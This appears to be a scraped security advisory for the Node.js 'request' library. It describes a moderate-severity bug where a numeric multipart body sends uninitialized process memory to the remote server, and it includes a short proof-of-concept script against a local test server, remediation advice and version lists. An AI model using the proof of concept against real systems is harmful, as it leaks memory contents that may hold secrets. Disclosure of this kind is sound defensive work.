Narcoleptic's Patch Mangler
request

Remote Memory Exposure

Severity: moderate

Overview

Affected versions of request will disclose local system memory to remote systems in certain circumstances. When a multipart request is made, and the type of body is number, then a buffer of that size will be allocated and sent to the remote server as the body.

Proof of Concept

var request = require('request');
var http = require('http');

var serveFunction = function (req, res){
    req.on('data', function (data) {
            console.log(data)
        });
    res.end();
};
var server = http.createServer(serveFunction);
server.listen(8000);

request({
    method: "POST",
    uri: 'http://localhost:8000',
    multipart: [{body:500}]
},function(err,res,body){});

Remediation

Update to version 2.68.0 or later

Vulnerable versions

2.2.6
7 years ago
2.2.9
7 years ago
2.9.0
7 years ago
2.9.1
7 years ago
2.9.2
7 years ago
2.9.3
7 years ago
2.9.100
7 years ago
2.9.150
6 years ago
2.9.151
6 years ago
2.9.152
6 years ago
2.9.153
6 years ago
2.9.200
6 years ago
2.9.201
6 years ago
2.9.202
6 years ago
2.9.203
6 years ago
2.10.0
6 years ago
2.11.0
6 years ago
2.11.1
6 years ago
2.11.2
6 years ago
2.11.3
6 years ago
2.11.4
6 years ago
2.12.0
6 years ago
2.14.0
5 years ago
2.16.0
5 years ago
2.16.2
5 years ago
2.16.4
5 years ago
2.16.6
5 years ago
2.18.0
5 years ago
2.19.0
5 years ago
2.20.0
5 years ago
2.21.0
5 years ago
2.22.0
5 years ago
2.23.0
5 years ago
2.24.0
5 years ago
2.25.0
5 years ago
2.26.0
5 years ago
2.27.0
5 years ago
2.28.0
5 years ago
2.29.0
5 years ago
2.30.0
5 years ago
2.31.0
5 years ago
2.32.0
5 years ago
2.33.0
5 years ago
2.34.0
4 years ago
2.35.0
4 years ago
2.36.0
4 years ago
2.37.0
4 years ago
2.38.0
4 years ago
2.39.0
4 years ago
2.40.0
4 years ago
2.41.0
4 years ago
2.42.0
4 years ago
2.43.0
4 years ago
2.44.0
4 years ago
2.45.0
4 years ago
2.46.0
4 years ago
2.52.0
4 years ago
2.53.0
4 years ago
2.54.0
3 years ago
2.55.0
3 years ago
2.56.0
3 years ago
2.57.0
3 years ago
2.58.0
3 years ago
2.59.0
3 years ago
2.60.0
3 years ago
2.61.0
3 years ago
2.62.0
3 years ago
2.63.0
3 years ago
2.64.0
3 years ago
2.65.0
3 years ago
2.66.0
3 years ago
2.67.0
3 years ago

Unaffected versions

0.10.0
8 years ago
0.8.3
8 years ago
0.9.0
8 years ago
0.9.1
8 years ago
0.9.5
8 years ago
1.0.0
8 years ago
1.1.0
8 years ago
1.1.1
8 years ago
1.2.0
8 years ago
1.9.0
8 years ago
1.9.1
7 years ago
1.9.2
7 years ago
1.9.3
7 years ago
1.9.5
7 years ago
1.9.7
7 years ago
1.9.8
7 years ago
1.9.9
7 years ago
2.0.0
7 years ago
2.0.1
7 years ago
2.0.2
7 years ago
2.0.3
7 years ago
2.0.4
7 years ago
2.0.5
7 years ago
2.1.0
7 years ago
2.1.1
7 years ago
2.2.0
7 years ago
2.2.5
7 years ago
2.47.0
4 years ago
2.48.0
4 years ago
2.49.0
4 years ago
2.50.0
4 years ago
2.51.0
4 years ago
2.68.0
3 years ago
2.69.0
3 years ago
2.70.0
2 years ago
2.71.0
2 years ago
2.72.0
2 years ago
2.73.0
2 years ago
2.74.0
2 years ago
2.75.0
2 years ago
2.76.0
2 years ago
2.77.0
2 years ago
2.78.0
2 years ago
2.79.0
2 years ago
2.80.0
a year ago
2.81.0
a year ago
2.82.0
a year ago
2.83.0
a year ago
2.84.0
5 months ago
2.85.0
5 months ago
2.86.0
3 months ago
2.87.0
3 months ago
2.88.0
5 days ago

Advisory timeline

  1. Published

    Advisory published
    Apr 14th, 2017
  2. Reported

    Initial report by Feross Aboukhadijeh
    Feb 1st, 2017